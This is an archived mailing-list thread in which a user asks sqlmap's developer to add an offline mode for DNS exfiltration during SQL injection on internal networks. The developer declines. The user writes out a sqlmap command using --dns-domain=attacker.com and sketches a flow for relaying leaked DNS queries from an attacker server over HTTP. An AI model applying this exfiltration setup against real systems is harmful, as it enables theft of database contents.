Thread: [sqlmap-users] feature request: offline mode for --dns-domain?
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: buawig <bu...@gm...> - 2013-04-16 21:30:04
|
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi, in cases where sqlmap is run against targets on internal networks it would be great if one could tell sqlmap to simply proceed without expecting incoming DNS requests, because sqlmap can not be executed directly on the DNS server (which can't reach the target, but the target can reach the DNS server). For me it would be enough to simply run something like - -u ... --dns-domain=attacker.com --dns-port=0 (--dns-port does not exist [yet]) to let sqlmap know that it doesn't need to start a DNS listener. I would then collect and decode the DNS querries on the DNS server manually, but I could also envision running a second sqlmap instance on the DNS server with --dns-domain (but without -u) doing that job. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz N5xHRCVPLLSrPfTPiyIJ =JSkD -----END PGP SIGNATURE----- |
|
From: Miroslav S. <mir...@gm...> - 2013-04-17 06:08:53
|
Hi. Problem is that sqlmap needs to have data retrieved to be able to do it's normal workflow. For example, if you do --dump sqlmap needs to know table columns. In your proposed case that would be problematic. Also, there are lots of cases when we ask server for a simple questions and we need an answer to be able to proceed. Also, in sqlmap DNS exfiltration works only if one other slower technique is available (e.g. time-based blind and/or boolean-based blind). In your proposed case that technique would need to be ignored completely - as it's automatically being used if DNS exfiltration fails. Kind regards, Miroslav Stampar On Apr 16, 2013 11:50 PM, "buawig" <bu...@gm...> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > Hi, > > in cases where sqlmap is run against targets on internal networks it > would be great if one could tell sqlmap to simply proceed without > expecting incoming DNS requests, because sqlmap can not be executed > directly on the DNS server (which can't reach the target, but the > target can reach the DNS server). > > For me it would be enough to simply run something like > - -u ... --dns-domain=attacker.com --dns-port=0 > (--dns-port does not exist [yet]) > > to let sqlmap know that it doesn't need to start a DNS listener. > > I would then collect and decode the DNS querries on the DNS server > manually, but I could also envision running a second sqlmap instance > on the DNS server with --dns-domain (but without -u) doing that job. > > -----BEGIN PGP SIGNATURE----- > > iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p > dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf > WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz > cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU > uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos > D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C > JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN > QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx > J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O > yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF > plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz > N5xHRCVPLLSrPfTPiyIJ > =JSkD > -----END PGP SIGNATURE----- > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: buawig <bu...@gm...> - 2013-04-17 17:12:49
|
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 > Problem is that sqlmap needs to have data retrieved to be able to > do it's normal workflow. For example, if you do --dump sqlmap > needs to know table columns. In your proposed case that would be > problematic. Also, there are lots of cases when we ask server for > a simple questions and we need an answer to be able to proceed. > > Also, in sqlmap DNS exfiltration works only if one other slower > technique is available (e.g. time-based blind and/or boolean-based > blind). In your proposed case that technique would need to be > ignored completely - as it's automatically being used if DNS > exfiltration fails. Hi Miraoslav, thanks for your answer. Yes, I wouldn't expect sqlmap to work "as usual" in such a scenario, but the manual back and forth wouldn't probably be much fun. An automated approach would be to make DNS querries reaching the DNS server available to sqlmap via HTTP since the internal host running sqlmap can also reach the DNS server. A simple script on the DNS server could simply write incoming DNS queries to a file that can be fetched via HTTP from sqlmap. So the request flow would be: 1) sqlmap host -> target 2) target makes DNS query to the attacker's DNS server 3) DNS server makes inbound queries available via HTTP i.e. https://attacker.com/dnsqueries.txt (optionally protected via HTTP auth) 4) after (1) sqlmap fetches DNS queries from https://attacker.com/dnsqueries.txt I realize that such an "internal" scenario might be not the most common setup, but nonetheless I wanted to share that problem and some thoughts about it. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRbtdKAAoJEJeRHQyF0ukM2WMQAINOvTBT9CA0N/ny5FbLJbeA UgW6ccUjeDDznI4vqOfq/LpRoStrOytkFiOoc4mWuCVHXG0wTTXIVgtQWHCZNkVd io3a4K/AAaLy9I5PUw3cAhar2djPTyJaR5FhobSriex2Pq5oGgQ5bORMXrRZD4rO f+dpZv2zVqNR9EMd5n56gmb1gkCQod8u3XrvN0WCiPOsK14y2tcMZPwpYAbJa68W W7+6/7Q03aoRPCpkf65Qg2U9cilXgHv6CJhF+VHDG3ODsB/PqnerBVzgB3997QEl Ei8lZrGua30e9ITd+qgKRILZjowRuTMiA/8BnktlMIFXh5fIn62k9xuT0B8d39kd v0g7harf3+uEb2KcnfnuHjzWU+TX3grz2ObdSJSg31O7Z6xNgHSVpsAVYc6Jo+uu CPggsaJZ5Mx9x3Av2kxmK1Tk/kXtMvTd0R6NowZsxU1rH/316LTnZna9nSL0Qb5S fUmvyEc5SIBvDnSA+R/85UAEqcHvXSeZESL55Sg/3oqTRZKcTH/1dogfcAjBZ7GB vFuo+VtJcPlLYqR/Lah/kvz0QVwTDmssirNz4aOhbdDjfpH+9iAjgVo3mbK1klr+ H9jhnrevH/fykFng8WJg040UoSiBpdJuUjqNm2bqbK3p9a+LosmPQ9+u7yjqQHNn FjIud4U9OHtX2Mh5nwr7 =lb5m -----END PGP SIGNATURE----- |
|
From: Miroslav S. <mir...@gm...> - 2013-04-18 08:45:58
|
Hi. I see your point, but this is more a case for a some kind of PoC tool (and not sqlmap). Such scenario would (IMO) involve one more step in already non-simple setup. It's not that it doesn't have any sense, but it doesn't help the automated tool like sqlmap. Kind regards, Miroslav Stampar On Wed, Apr 17, 2013 at 7:09 PM, buawig <bu...@gm...> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > > Problem is that sqlmap needs to have data retrieved to be able to > > do it's normal workflow. For example, if you do --dump sqlmap > > needs to know table columns. In your proposed case that would be > > problematic. Also, there are lots of cases when we ask server for > > a simple questions and we need an answer to be able to proceed. > > > > Also, in sqlmap DNS exfiltration works only if one other slower > > technique is available (e.g. time-based blind and/or boolean-based > > blind). In your proposed case that technique would need to be > > ignored completely - as it's automatically being used if DNS > > exfiltration fails. > > Hi Miraoslav, > > thanks for your answer. > Yes, I wouldn't expect sqlmap to work "as usual" in such a scenario, > but the manual back and forth wouldn't probably be much fun. > > An automated approach would be to make DNS querries reaching the DNS > server available to sqlmap via HTTP since the internal host running > sqlmap can also reach the DNS server. > A simple script on the DNS server could simply write incoming DNS > queries to a file that can be fetched via HTTP from sqlmap. > > So the request flow would be: > > 1) sqlmap host -> target > 2) target makes DNS query to the attacker's DNS server > 3) DNS server makes inbound queries available via HTTP i.e. > https://attacker.com/dnsqueries.txt (optionally protected via HTTP auth) > 4) after (1) sqlmap fetches DNS queries from > https://attacker.com/dnsqueries.txt > > I realize that such an "internal" scenario might be not the most > common setup, but nonetheless I wanted to share that problem and some > thoughts about it. > -----BEGIN PGP SIGNATURE----- > > iQIcBAEBCgAGBQJRbtdKAAoJEJeRHQyF0ukM2WMQAINOvTBT9CA0N/ny5FbLJbeA > UgW6ccUjeDDznI4vqOfq/LpRoStrOytkFiOoc4mWuCVHXG0wTTXIVgtQWHCZNkVd > io3a4K/AAaLy9I5PUw3cAhar2djPTyJaR5FhobSriex2Pq5oGgQ5bORMXrRZD4rO > f+dpZv2zVqNR9EMd5n56gmb1gkCQod8u3XrvN0WCiPOsK14y2tcMZPwpYAbJa68W > W7+6/7Q03aoRPCpkf65Qg2U9cilXgHv6CJhF+VHDG3ODsB/PqnerBVzgB3997QEl > Ei8lZrGua30e9ITd+qgKRILZjowRuTMiA/8BnktlMIFXh5fIn62k9xuT0B8d39kd > v0g7harf3+uEb2KcnfnuHjzWU+TX3grz2ObdSJSg31O7Z6xNgHSVpsAVYc6Jo+uu > CPggsaJZ5Mx9x3Av2kxmK1Tk/kXtMvTd0R6NowZsxU1rH/316LTnZna9nSL0Qb5S > fUmvyEc5SIBvDnSA+R/85UAEqcHvXSeZESL55Sg/3oqTRZKcTH/1dogfcAjBZ7GB > vFuo+VtJcPlLYqR/Lah/kvz0QVwTDmssirNz4aOhbdDjfpH+9iAjgVo3mbK1klr+ > H9jhnrevH/fykFng8WJg040UoSiBpdJuUjqNm2bqbK3p9a+LosmPQ9+u7yjqQHNn > FjIud4U9OHtX2Mh5nwr7 > =lb5m > -----END PGP SIGNATURE----- > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X